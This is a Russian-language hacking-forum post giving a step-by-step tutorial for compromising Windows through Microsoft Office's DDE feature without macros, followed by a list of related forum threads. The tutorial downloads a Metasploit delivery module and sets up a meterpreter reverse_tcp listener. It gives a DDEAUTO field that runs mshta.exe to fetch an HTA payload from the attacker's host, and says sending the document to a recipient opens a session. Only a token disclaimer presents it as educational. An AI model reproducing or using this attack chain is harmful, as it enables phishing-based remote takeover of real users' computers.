Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

  • Автор темы klobald
  • Дата начала
K

klobald

Original poster
DDE-Exploit.jpg





DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit
  • Машина использующая операционную систему Windows
  • Microsoft Office (любая версия)
  • KALI LINUX
Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.

Код: 
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Отправьте скрипт в местоположение Metasploit
Код: 
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Screen-Shot-2017-11-09-at-5.50.40-PM.png



Теперь наберите msfconsole на терминале, который запускает Metasploit framework, а затем наберите reload_all, чтобы загрузить модули.
Screen-Shot-2017-11-09-at-5.56.08-PM.png



Этот эксплойт использует функцию dde, чтобы поставить hta payload. А теперь наберите
Код: 
use exploit/windows/dde_delivery

затем установите хост сервера, используя следующую команду:
Код: 
set SRVHOST 192.168.177.141
мы должны установить прослушиватель payload. Не используйте порт 8080, поскольку порт сервера установлен по умолчанию на 8080.
  1. установите PAYLOAD windows/meterpreter/reverse_tcp
  2. установите LHOST 192.168.177.141
  3. установите LPORT 6708
  4. эксплойт
Screen-Shot-2017-11-09-at-6.29.07-PM.png




Теперь вставьте код в любой документ word. Мы использовали полностью обновленный office 365 pro plus. Разместите формулу, и у вас должно быть небольшое поле ошибки в документе, а затем щелкните правой кнопкой мыши по коду. Вставьте команду в документ между цветными скобками. Сохраните документ.
Код: 
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
После отправки документа получателю у вас откроется сессия измерителя.

Отказ от ответственности

Эта статья предназначена только для образовательных целей. Любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, будут рассматриваться исключительно в зоне действия вашей ответственности. Нелегальное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
не будут нести ответственность в случае возбуждения уголовного обвинения против любых лиц, злоупотребляющих информацией на этом веб-сайте, с целью нарушения закона.


Источник:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
 
Для ответа нужно войти/зарегистрироваться
Название темы
Автор Заголовок Раздел Ответы Дата
Emilio_Gaviriya Статья Использование фреймворка Empire C2. Вирусология 0
H Основы Linux для начинающего "Хакера" - Использование скриптов запуска Корзина 0
A Использование JavaScript, для взлома сети Уязвимости и взлом 0
M Использование мобильного интернета без денег на счету. Полезные статьи 12
J Использование SSH-туннеля Полезные статьи 0
K Использование Burp Suite в сценариях человек-посередине (MitM): сбор информации, перехват паролей, заражение бэкдорами Уязвимости и взлом 0
C Использование API ключа rucaptcha | Проекты Private Keeper С/C++ 0
J Использование freekassa - к беде Новости в сети 0
N MIX COOKIES WINDOWS INSTAGRAM 360 FACEBOOK TWITTER LINKEDIN SHOP Раздача email 0
Support81 Пользователи Windows, будьте осторожны: DarkGate использует уязвимость нулевого дня Новости в сети 0
R Windows 11 Ukraine Свободное общение и флейм 0
S Новый Windows 11 этой осенью Свободное общение и флейм 4
R Скоростные VPS сервера на Windows — OneDash RDP Сайты/Хостинг/Сервера 1
R Незагружается Windows 10 + VeraCrypt Свободное общение и флейм 4
E Уязвимости в SolarWinds позволяли перехватить контроль над Windows-серверами Новости в сети 0
D Повышение прав Windows Server 2008 Предоставляю работу. Ищу специалиста. 0
Y Windows 10. Настройка и мифы Полезные статьи 2
G Интересно [Chrome] режим Инкогнито по ярлыку в Windows. Анонимность и приватность 0
H Очистка и перезагрузка кеша DNS в Windows Корзина 0
H Новый Linux-модуль платформы TrickBot тайно атакует Windows-ПК Подробнее: https://www.securitylab.ru/news/510661.php Корзина 0
V Ожидает оплаты Продажа дедиков серверов купить vps vds на windows от 60 рублей! магазин vps vds дедиков и виртуальных серверов vps vds https://vpskot.ru Дедики/VPN/соксы/ssh 72
NickelBlack Интересно Уязвимость Zero Day в Защитнике Windows AV Уязвимости и взлом 1
Denik Интересно Взлом WINDOWS 10 с помощью TORAT Уязвимости и взлом 4
Д Аренда VPS/VDS сервера. Аренда VPS от 260 руб. Windows/Linux Server. Сайты/Хостинг/Сервера 3
Y Установка и настройка OpenVPN сервера на windows Полезные статьи 2
Denik Интересно Учимся использовать Windows при полной анонимности Анонимность и приватность 1
Denik Интересно Трояны для слежки под Windows, macOS, Linux, Android, iOS Анонимность и приватность 0
CMDfromBAT Интересно Ninjutsu-OS: "Kali Linux" в среде Windows Полезные статьи 48
G Продам GhostSeller - Windows VPS (дедики) практически под любой софт Дедики/VPN/соксы/ssh 1
andre5787 Whonix + Windows 7 x64 Вопросы и интересы 1
E Интересно Превращаем обычный смартфон с Android в настоящий Windows Полезные статьи 0
Y Продам софт Windows,Антивирусы,Набор Office Pro Plus,Google диски Продажа софта 1
S Усовершенствованный метод сокрытия подгруженной dll в изложении на C для новых ОС семейства Windows Уязвимости и взлом 0
GhosTM@n Интересно Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream Полезные статьи 0
S Продам vps windows linux 2.50 $ месяц, вы также можете арендовать на час за 0.03 $ Сайты/Хостинг/Сервера 2
S Запускаем Windows 10 на калькуляторе Полезные статьи 2
S Разработка ПО под Windows Ищу работу. Предлагаю свои услуги. 3
G Перепродажа ключей windows Способы заработка 5
W Ключ на Windows 10 pro Другое 0
W Быстрая активация любой версии Windows | Office без программ. Обновления воркают Другое 3
M RedAlert - издеваемся над Windows вашего друга Полезные статьи 0
Multi-VPN Как отключить IPv6 в Windows и не спалить свой IPv6 адрес за VPN SSH / дедики / Vpn / Proxy / Socks 0
M Разведка в Active Directory. Получаем пользовательские данные в сетях Windows без привилегий Корзина 2
M Сочетания клавиш Windows которые полезно знать Полезные статьи 0
M Взлом пароля Windows 10, 8 и 7 программой John the Ripper Анонимность и приватность 0
4 4server.su - Аренда дедиков на windows от 298р/мес(любые задачи)[NEW Аренда через бота Telegram] Ищу работу. Предлагаю свои услуги. 0
S Прятачем файлы в картинке (Windows) Полезные статьи 0
M Конфиденциальность Windows 10: минимизируем передачу данных Настройка системы для работы 2
M Wox Launcher - сильная альтернатива поиску Windows Софт для работы с текстом/Другой софт 0
B Интересно Kali Linux в WINDOWS Полезные статьи 7

Название темы

Верх Низ